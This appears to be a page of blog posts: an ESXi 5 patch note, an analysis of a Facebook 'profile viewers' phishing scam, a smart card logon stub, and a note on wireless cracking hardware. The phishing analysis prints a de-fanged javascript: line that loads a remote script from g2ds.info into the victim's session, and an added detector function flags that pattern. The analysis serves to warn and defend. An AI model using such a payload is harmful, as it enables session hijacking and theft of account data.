
VMware ESXi 5 Auto Start/Shutdown

VMware recently (and quietly) published a patch that I have confirmed will resolve a guest virtual machine startup and shutdown issue that was introduced in March 2012 when they released Update 1.

The issue was that it broke the automatic startup and shutdown of the guest virtual machines when the host machine boots or shuts down. This did not affect enterprise customers who use a cluster, but vastly impacted many of us running individual nodes. Not surprisingly, this only affected the free version of the hypervisor and took 4 months before they decided to fix it due to 1.) community outrage and 2.) the issue extending to some paying enterprise customers.

The patch is ESXi500-201207001 and can be found here: http://www.vmware.com/patchmgr/download.portal. Just search for ESXi 5.0.0. Please note that if you aren’t running the latest patch before this one, you will need to update them sequentially before applying this patch.

As a note to the folks at VMware: You guys barely averted losing your edge as a virtualization market leader due to angry users. This is not the first time either.

Facebook Security: An Old Phishing Trick, Revived & Analyzed.

In the past, you may remember that I’ve written about many instances where Facebook users were falling for a trick where a link gets posted on their wall asking them to click a fake link in order to gain access to some “cool” feature such as getting a free iPad, gaining access to see other people’s hidden profile information, or getting free male enhancements. They all work on the same principle: a user clicks on a link that takes them to a Facebook page, which instructs them to paste a line of JavaScript code into their URL bar and press enter. In turn, this tells the user’s browser to run code that can do pretty much whatever it wants to do with your Facebook session or anything else you might have open, for that matter.

For all you non-tech users out there: DON’T EVER paste or click any link without first checking out what it may do. And as always, if it sounds too good to be true, IT PROBABLY IS!

In the rest of this post, I’ll analyze in detail one particular phishing scheme that happened to explode all over Facebook in the last 24-ish hours. Keep in mind, most of the phishing right now is based on this. The rest of the Facebook phishing is done by sending you a fake e-mail with a link to a fake Facebook login page, which then steals your e-mail address and password.

The scam starts with a link sent to you by e-mail and/or posted on your wall. It looks something like this:


The link posted takes you to a Facebook page that looks like this:


In this particular Facebook page, it redirects you to a 3rd party domain (kkpj.info), which takes you back to another Facebook page that looks exactly like the previous. This is done to retain a Facebook page that they can use to redirect to additional, different Facebook pages, should it be reported. In other words, if the malicious page gets reported, it would be the second one, allowing the original page to be retained and modified. I found this one because NoScript (Firefox Plugin) blocks scripts by default:


This second Facebook page looks like this:


And this one is the one that instructs you to copy and paste some code to run in your browser’s URL bar. Very bad idea for the end user. Let’s take a closer look at the code itself (this one has been de-fanged – refang at your own risk):

javascript: /* FACEBOOK PROFILE VIEWERS */ (a=(b=document).createElement(script)).src=//g2ds.info/d.php?split=1rand=329154403,b.body.appendChild(a) void(0) /* FACEBOOK PROFILE VIEWERS */

This basically tells the browser to execute whatever scripts lie at g2ds.info/d.php with a few parameters from your current Facebook session, most prominently your friends list, but can also include your profile information (e-mail address, residence, phone numbers), or even your Facebook credentials. This kind of attack falls under the category of “User Induced Cross Site Scripting (XSS)”.
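As an added example (not part of the original post), the following function does static triage of text a user has been told to paste into the URL bar: it normalises the scheme, strips decoy comments, and flags the "create a script element, point it at a remote host, append it to the page" pattern described above. The function name, signal names and verdict labels are assumptions made for this illustration; the sample string is the de-fanged one from the post.

```javascript
// Added example: static triage of text a user was told to paste into the URL bar.
// Signal names and verdict labels are assumptions made for this illustration.
function analyzePastedUrl(text) {
  // Browsers ignore leading whitespace/control characters and embedded tabs or
  // newlines when parsing the scheme, so normalise before testing it.
  const normalised = text.replace(/^[\u0000-\u0020]+/, "").replace(/[\t\r\n]/g, "");
  const match = /^javascript:/i.exec(normalised);
  if (!match) {
    return { scheme: "other", signals: [], remoteHosts: [], verdict: "not-a-script-url" };
  }
  // Drop /* ... */ comments such as the decoy banner in the sample.
  const body = normalised.slice(match[0].length).replace(/\/\*[\s\S]*?\*\//g, " ");

  const signals = [];
  if (/createElement\s*\(\s*["']?script["']?\s*\)/i.test(body)) signals.push("creates-script-element");
  if (/\.src\s*=/.test(body)) signals.push("sets-src");
  if (/appendChild\s*\(|insertBefore\s*\(/.test(body)) signals.push("inserts-into-dom");
  if (/document\.cookie/.test(body)) signals.push("reads-cookies");

  // Collect hosts from absolute or protocol-relative URLs (quoted or de-fanged).
  const remoteHosts = [];
  const hostRe = /(?:https?:)?\/\/([a-z0-9.-]+\.[a-z]{2,})/gi;
  for (const m of body.matchAll(hostRe)) {
    const host = m[1].toLowerCase();
    if (!remoteHosts.includes(host)) remoteHosts.push(host);
  }

  // A script element whose src points off-site is the loader pattern from the post.
  const loadsRemote = signals.includes("creates-script-element") &&
    signals.includes("sets-src") && remoteHosts.length > 0;
  const verdict = loadsRemote ? "remote-script-loader" : "script-url";
  return { scheme: "javascript", signals, remoteHosts, verdict };
}

// The de-fanged sample from the post, copied as it appears there.
const SAMPLE = "javascript: /* FACEBOOK PROFILE VIEWERS */ (a=(b=document).createElement(script)).src=//g2ds.info/d.php?split=1rand=329154403,b.body.appendChild(a) void(0) /* FACEBOOK PROFILE VIEWERS */";

console.log(analyzePastedUrl(SAMPLE));
```

The same check can sit in a mail or proxy filter that scans page text for instructions to paste a javascript: string, since the scam depends on the user doing the pasting.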

A few other interesting notes:

    kkpj.info’s index page simply redirects the user to the second Facebook page via JavaScript.
    Both kkpj.info and g2ds.info have the same IP address (, are registered through eNom, Inc, and are hosted by hostgator.com, as evidenced by their nameservers, NS2767.HOSTGATOR.COM and NS2768.HOSTGATOR.COM. Private registration of these 2 domains prevents identifying details from being revealed.
    g2ds.info is the actual domain where the malicious scripts are run from.


Enabling Smartcard Logon for Active Directory

Since I couldn’t find an all-in-one guide anywhere out there, I’m going to write up a short post on how to enable smart card logon in a Microsoft Active Directory environment.

It’s short since I’m a little bit lazy in documenting every step (these are mainly notes for myself), but if enough people request, I’ll expand this post to include more details.


Atheros AR9170 & BackTrack 4

I recently broke out my Netgear WNDA3100 adapter that I bought a while ago to replace my old Netgear WG111 that I used to use for cracking wireless networks. Granted, the WG111 was reliable, but the reasons for the replacement are obvious: the WNDA3100 is dual-band and supports 802.11n. But for beginners who don’t want to shell out as much money nor spend extra time getting a wireless card to work properly, the WG111 is still the best choice.

Spend extra time to get the WNDA3100 to work properly? Yes, it didn’t quite readily work with BT4 (and probably not with other distros running the same kernel version). After doing some searching, I found a thread on backtrack-linux.org’s forum that allows my new adapter to work, with full monitor mode & packet injection capabilities. As a matter of record & for easy searching, I’ll document the directions below.
